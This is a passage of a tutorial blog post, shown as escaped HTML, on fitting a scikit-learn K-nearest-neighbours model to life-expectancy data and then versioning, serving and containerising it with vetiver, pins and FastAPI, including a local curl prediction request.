&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;data &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; data&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;dropna()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;data &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; data&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;clean_names(strip_underscores&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#79c0ff"&gt;True&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;data &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; data[[
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;life_expectancy&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;percentage_expenditure&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;total_expenditure&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;population&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;bmi&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;schooling&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;]]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;data&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;head()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; life_expectancy percentage_expenditure ... bmi schooling&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; 0 65.0 71.279624 ... 19.1 10.1&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; 1 59.9 73.523582 ... 18.6 10.0&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; 2 59.9 73.219243 ... 18.1 9.9&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; 3 59.5 78.184215 ... 17.6 9.8&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; 4 59.2 7.097109 ... 17.2 9.5&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; [5 rows x 6 columns]&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Vetiver is compatible with models built in
&lt;a href="https://scikit-learn.org/stable/" rel="external"&gt;scikit-learn&lt;/a&gt;,
&lt;a href="https://pytorch.org/" rel="external"&gt;PyTorch&lt;/a&gt;,
&lt;a href="https://xgboost.readthedocs.io/en/stable/python/" rel="external"&gt;XGBoost&lt;/a&gt; and
&lt;a href="https://www.statsmodels.org/stable/" rel="external"&gt;statsmodels&lt;/a&gt;. The actual modelling
process is not so important in this blog. We will be more interested in
how we go about taking this model into production using vetiver. So
let’s go with a simple &lt;em&gt;K&lt;/em&gt;-Nearest Neighbour model built using
scikit-learn:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;from&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;sklearn.neighbors&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; KNeighborsRegressor
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;from&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;sklearn.pipeline&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; Pipeline
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;from&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;sklearn.preprocessing&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; StandardScaler
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;target &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;life_expectancy&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;covariates &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; [
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;percentage_expenditure&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;total_expenditure&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;population&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;bmi&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;schooling&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;y &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; data[target]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;X &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; data[covariates]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;model &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; Pipeline(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; [
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; (&lt;span style="color:#a5d6ff"&gt;&amp;#34;transform&amp;#34;&lt;/span&gt;, StandardScaler()),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; (&lt;span style="color:#a5d6ff"&gt;&amp;#34;model&amp;#34;&lt;/span&gt;, KNeighborsRegressor()),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;model&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;fit(X, y)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; Pipeline(steps=[(&amp;#39;transform&amp;#39;, StandardScaler()),&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; (&amp;#39;model&amp;#39;, KNeighborsRegressor())])&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Let’s break down what’s happened here:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;We selected our target variable (life expectancy) and the covariates
(features) that will be used to predict the target.&lt;/li&gt;
&lt;li&gt;We constructed a modelling pipeline which includes:
&lt;ul&gt;
&lt;li&gt;Preprocessing of input data via standardisation.&lt;/li&gt;
&lt;li&gt;&lt;em&gt;K&lt;/em&gt;-Nearest Neighbours regression.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;In the final step, we fitted our model to the training data.&lt;/li&gt;
&lt;/ul&gt;
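&lt;p&gt;To make the two pipeline steps more concrete, here is a minimal pure-Python sketch of standardisation followed by &lt;em&gt;K&lt;/em&gt;-Nearest Neighbours regression. It is not how scikit-learn implements them, and the helper names (&lt;code&gt;standardise&lt;/code&gt;, &lt;code&gt;knn_predict&lt;/code&gt;) and the toy data are made up for illustration. It assumes Euclidean distance and an unweighted average of the neighbours' targets.&lt;/p&gt;

```python
import math
import statistics


def standardise(rows):
    """Scale each column to zero mean and unit standard deviation."""
    columns = list(zip(*rows))
    means = [statistics.fmean(col) for col in columns]
    # Population standard deviation, falling back to 1.0 for constant columns.
    sds = [statistics.pstdev(col) or 1.0 for col in columns]
    scaled = [
        [(value - m) / s for value, m, s in zip(row, means, sds)]
        for row in rows
    ]
    return scaled, means, sds


def knn_predict(train_X, train_y, query, k=5):
    """Average the targets of the k training rows closest to the query."""
    distances = sorted(
        (math.dist(row, query), target) for row, target in zip(train_X, train_y)
    )
    nearest = [target for _, target in distances[:k]]
    return statistics.fmean(nearest)


# Toy data (made up for illustration): two features on very different scales.
X_toy = [[1.0, 1000.0], [2.0, 2000.0], [3.0, 3000.0], [10.0, 9000.0]]
y_toy = [50.0, 55.0, 60.0, 80.0]

X_scaled, means, sds = standardise(X_toy)
# A new observation must be scaled with the training means and deviations.
new_row = [(v - m) / s for v, m, s in zip([2.5, 2500.0], means, sds)]
prediction = knn_predict(X_scaled, y_toy, new_row, k=2)
print(prediction)
```

&lt;p&gt;Without the scaling step, the second feature would dominate the distance calculation simply because its values are larger, which is why the pipeline standardises the inputs before the neighbours are found.&lt;/p&gt;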
&lt;p&gt;Usually at this point we would evaluate how our model performs on some
unseen test data. However, for brevity we’ll now go straight to the
MLOps steps.&lt;/p&gt;
&lt;h2 id="mlops"&gt;MLOps&lt;/h2&gt;
&lt;p&gt;In a typical MLOps workflow, we are setting up a continuous cycle in
which our trained model is deployed to a cloud environment, monitored in
this environment, and then retrained on the latest data. The cycle
repeats so that we are always maintaining a high model performance and
avoiding the dreaded model drift (more on this later).&lt;/p&gt;
&lt;img src="https://www.jumpingrivers.com/blog/vetiver-mlops-python-deployment/mlops-flow.png" alt="A flow chart showing the typical MLOps workflow. We begin by importing and tidying our data sets. We then fit a model to this data, and this model is versioned and deployed to the cloud. After it is deployed we then monitor the model, and we repeat the cycle by retraining the model on the latest data to maintain an acceptable performance." style="display: block; margin: auto;" /&gt;
&lt;p&gt;From the diagram above, the crucial steps that set this workflow apart
from a typical data science project are model versioning, deployment and
monitoring. We will go through each of these in turn using vetiver.&lt;/p&gt;
&lt;p&gt;Before we can begin, we must convert our scikit-learn model into a
“vetiver model”:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;vetiver&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;v_model &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; vetiver&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;VetiverModel(model, model_name&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;KNN&amp;#34;&lt;/span&gt;, prototype_data&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;X)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;print(type(v_model))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; &amp;lt;class &amp;#39;vetiver.vetiver_model.VetiverModel&amp;#39;&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;print(v_model&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;description)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; A scikit-learn Pipeline model&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;print(v_model&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;metadata)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; VetiverMeta(user={}, version=None, url=None, required_pkgs=[&amp;#39;scikit-learn&amp;#39;], python_version=(3, 10, 12, &amp;#39;final&amp;#39;, 0))&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Our &lt;code&gt;VetiverModel&lt;/code&gt; object contains model metadata and dependencies
(including the Python packages used to train it and the current Python
version). The &lt;code&gt;model_name&lt;/code&gt; will be used to identify the model later on,
and the &lt;code&gt;prototype_data&lt;/code&gt; will provide some example data for the model
API (more on this below).&lt;/p&gt;
&lt;h3 id="model-versioning"&gt;Model versioning&lt;/h3&gt;
&lt;p&gt;In a cycle where our model is continuously being retrained, it is
important to ensure that we can retrieve any models that have previously
been deployed. Vetiver utilises the
&lt;a href="https://rstudio.github.io/pins-python/" rel="external"&gt;pins&lt;/a&gt; package for model
storage. A pin is simply a Python object (could be a variable, data
frame, function, …) which can be stored and retrieved at a later time.
Pins are stored in “pins boards”. Examples include:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Local storage on your device&lt;/li&gt;
&lt;li&gt;Google Drive&lt;/li&gt;
&lt;li&gt;Amazon S3&lt;/li&gt;
&lt;li&gt;Posit Connect&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Let’s set up a temporary pins board locally for storing our model:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;from&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;pins&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; board_temp
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;model_board &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; board_temp(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; versioned&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#79c0ff"&gt;True&lt;/span&gt;, allow_pickle_read&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#79c0ff"&gt;True&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;vetiver&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;vetiver_pin_write(model_board, v_model)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; Model Cards provide a framework for transparent, responsible reporting. &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; Use the vetiver `.qmd` Quarto template as a place to start, &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; with vetiver.model_card()&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; Writing pin:&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; Name: &amp;#39;KNN&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; Version: 20250220T141808Z-af3d5&lt;/span&gt;
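&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Setting &lt;code&gt;allow_pickle_read=True&lt;/code&gt; permits the board to read pickled objects, which
is needed to load the model back later on. Only enable this for boards you
trust, since unpickling can execute arbitrary code.&lt;/p&gt;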
&lt;p&gt;At this stage our &lt;code&gt;VetiverModel&lt;/code&gt; object is now stored as a pin, and we
can view the full list of “KNN” model versions using:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;model_board&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;pin_versions(&lt;span style="color:#a5d6ff"&gt;&amp;#34;KNN&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; created hash version&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; 0 2025-02-20 14:18:08 af3d5 20250220T141808Z-af3d5&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;As expected, we only have one version stored so far!&lt;/p&gt;
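&lt;p&gt;To illustrate why versioning matters, the sketch below mimics a versioned board with a small in-memory class. &lt;code&gt;ToyBoard&lt;/code&gt; is hypothetical and is not part of pins or vetiver. The version labels copy the "timestamp-hash" shape seen above, but the use of SHA-256 is an assumption made purely for illustration.&lt;/p&gt;

```python
import hashlib
import pickle
from datetime import datetime, timezone


class ToyBoard:
    """A hypothetical in-memory stand-in for a versioned pins board."""

    def __init__(self):
        self._pins = {}  # pin name maps to a list of (version, payload) pairs

    def write(self, name, obj, created):
        payload = pickle.dumps(obj)
        # Assumption: SHA-256 stands in for whichever hash pins really uses.
        digest = hashlib.sha256(payload).hexdigest()[:5]
        version = created.strftime("%Y%m%dT%H%M%SZ") + "-" + digest
        self._pins.setdefault(name, []).append((version, payload))
        return version

    def versions(self, name):
        return [version for version, _ in self._pins[name]]

    def read(self, name, version=None):
        """Return the requested version, or the newest one by default."""
        entries = dict(self._pins[name])
        if version is None:
            version = self.versions(name)[-1]
        return pickle.loads(entries[version])


board = ToyBoard()
first = board.write(
    "KNN", {"n_neighbors": 5}, datetime(2025, 2, 20, 14, 18, 8, tzinfo=timezone.utc)
)
second = board.write(
    "KNN", {"n_neighbors": 7}, datetime(2025, 3, 20, 9, 0, 0, tzinfo=timezone.utc)
)
print(board.versions("KNN"))
print(board.read("KNN"))                 # newest version
print(board.read("KNN", version=first))  # roll back to the first version
```

&lt;p&gt;Because every write is kept under its own label, a retrained model never overwrites the one it replaces, and an earlier version can be restored if the new one misbehaves.&lt;/p&gt;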
&lt;h3 id="model-deployment"&gt;Model deployment&lt;/h3&gt;
&lt;p&gt;If we want to share our model with other users (colleagues,
stakeholders, customers) we should deploy it to an endpoint on the cloud
where it can be easily shared. To keep things simple for this blog, and
to ensure the code examples provided here are fully reproducible, we
will just deploy our model to the localhost.&lt;/p&gt;
&lt;p&gt;First we have to construct a model API. This is a simple interface which
takes some input and gives us back some model predictions. Crucially,
APIs can be hosted on the cloud where they can receive input data via
HTTP requests.&lt;/p&gt;
&lt;p&gt;Our &lt;code&gt;VetiverModel&lt;/code&gt; object already contains all of the info necessary to
build an API using the &lt;a href="https://fastapi.tiangolo.com/" rel="external"&gt;FastAPI&lt;/a&gt;
framework:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;app &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; vetiver&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;VetiverAPI(v_model, check_prototype&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#79c0ff"&gt;True&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Running &lt;code&gt;app.run(port=8080)&lt;/code&gt; will start a local server for the model API
on port 8080. We are then presented with a simple graphical interface in
which we can run basic queries and generate predictions using our model.
The &lt;code&gt;prototype_data&lt;/code&gt; argument which we defined when constructing our
&lt;code&gt;VetiverModel&lt;/code&gt; (see above) is used here to provide some example input
data for queries:&lt;/p&gt;
&lt;img src="https://www.jumpingrivers.com/blog/vetiver-mlops-python-deployment/api_screenshot.png" alt="A screenshot of the user interface for the deployed model API. Some example input data is shown in a JSON format which can be ingested by the model. A try button is provided for the user to generate model predictions using this data. There are also buttons to clear the example data and fill in a new example." style="display: block; margin: auto;" /&gt;
&lt;p&gt;Alternatively we can also submit queries from the command line. The
graphical interface above provides template &lt;code&gt;curl&lt;/code&gt; commands which can be
copied into the command line and executed against the model. For
example, the input data shown in the above screenshot can be fed into
the model via a POST request:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -X POST &lt;span style="color:#a5d6ff"&gt;&amp;#34;http://127.0.0.1:8080/predict&amp;#34;&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#79c0ff"&gt;&lt;/span&gt; -H &lt;span style="color:#a5d6ff"&gt;&amp;#34;Accept: application/json&amp;#34;&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#79c0ff"&gt;&lt;/span&gt; -H &lt;span style="color:#a5d6ff"&gt;&amp;#34;Content-Type: application/json&amp;#34;&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#79c0ff"&gt;&lt;/span&gt; -d &lt;span style="color:#a5d6ff"&gt;&amp;#39;[{&amp;#34;percentage_expenditure&amp;#34;:71.27962362,&amp;#34;total_expenditure&amp;#34;:8.16,&amp;#34;population&amp;#34;:33736494,&amp;#34;bmi&amp;#34;:19.1,&amp;#34;schooling&amp;#34;:10.1}]&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The same command would work for querying APIs on the cloud as long as
the IP address for the API endpoint (here it is &lt;a href="http://127.0.0.1" rel="external"&gt;http://127.0.0.1&lt;/a&gt;,
which points to the
&lt;a href="https://en.wikipedia.org/wiki/Localhost" rel="external"&gt;localhost&lt;/a&gt;) is updated
accordingly.&lt;/p&gt;
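&lt;p&gt;The same POST request can also be built from Python. The sketch below uses only the standard library and reuses the URL, headers and input record from the curl example. The &lt;code&gt;send&lt;/code&gt; helper is a name chosen here for illustration, and the call is left commented out because it only works while the local API is running.&lt;/p&gt;

```python
import json
import urllib.request

# Input record copied from the curl example above.
payload = [
    {
        "percentage_expenditure": 71.27962362,
        "total_expenditure": 8.16,
        "population": 33736494,
        "bmi": 19.1,
        "schooling": 10.1,
    }
]

request = urllib.request.Request(
    "http://127.0.0.1:8080/predict",
    data=json.dumps(payload).encode("utf-8"),
    headers={"Accept": "application/json", "Content-Type": "application/json"},
    method="POST",
)


def send(req, timeout=10):
    """Send the request and decode the JSON reply; needs the API to be running."""
    with urllib.request.urlopen(req, timeout=timeout) as response:
        return json.loads(response.read().decode("utf-8"))


# Uncomment once the local server started by app.run(port=8080) is up:
# print(send(request))
```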
&lt;p&gt;Deploying your model locally is a great way to test that your API
behaves as you expect. What’s more, it’s free and does not require
setting up an account with a cloud provider! But how would we go about
deploying our model to the cloud?&lt;/p&gt;
&lt;p&gt;If you already have a server on &lt;a href="https://posit.co/products/enterprise/connect/" rel="external"&gt;Posit
Connect&lt;/a&gt;, it’s just a
case of running &lt;code&gt;vetiver.deploy_rsconnect()&lt;/code&gt; (see the &lt;a href="https://vetiver.posit.co/get-started/deploy.html" rel="external"&gt;Posit vetiver
documentation&lt;/a&gt; for
more details). If you don’t have Posit Connect, not to worry! Instead
you can start by running:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;vetiver&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;prepare_docker(model_board, &lt;span style="color:#a5d6ff"&gt;&amp;#34;KNN&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;This command is doing a lot of heavy lifting behind the scenes:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Lists the Python package dependencies in a
&lt;strong&gt;vetiver_requirements.txt&lt;/strong&gt; file.&lt;/li&gt;
&lt;li&gt;Stores the Python code for the model API in an &lt;strong&gt;app.py&lt;/strong&gt; file.&lt;/li&gt;
&lt;li&gt;Creates a &lt;strong&gt;Dockerfile&lt;/strong&gt; containing the Python version requirement for
the model and the docker commands for building and running the API. An
example is shown below:&lt;/li&gt;
&lt;/ul&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-docker" data-lang="docker"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# # Generated by the vetiver package; edit with care&lt;/span&gt;&lt;span style="color:#f85149"&gt;
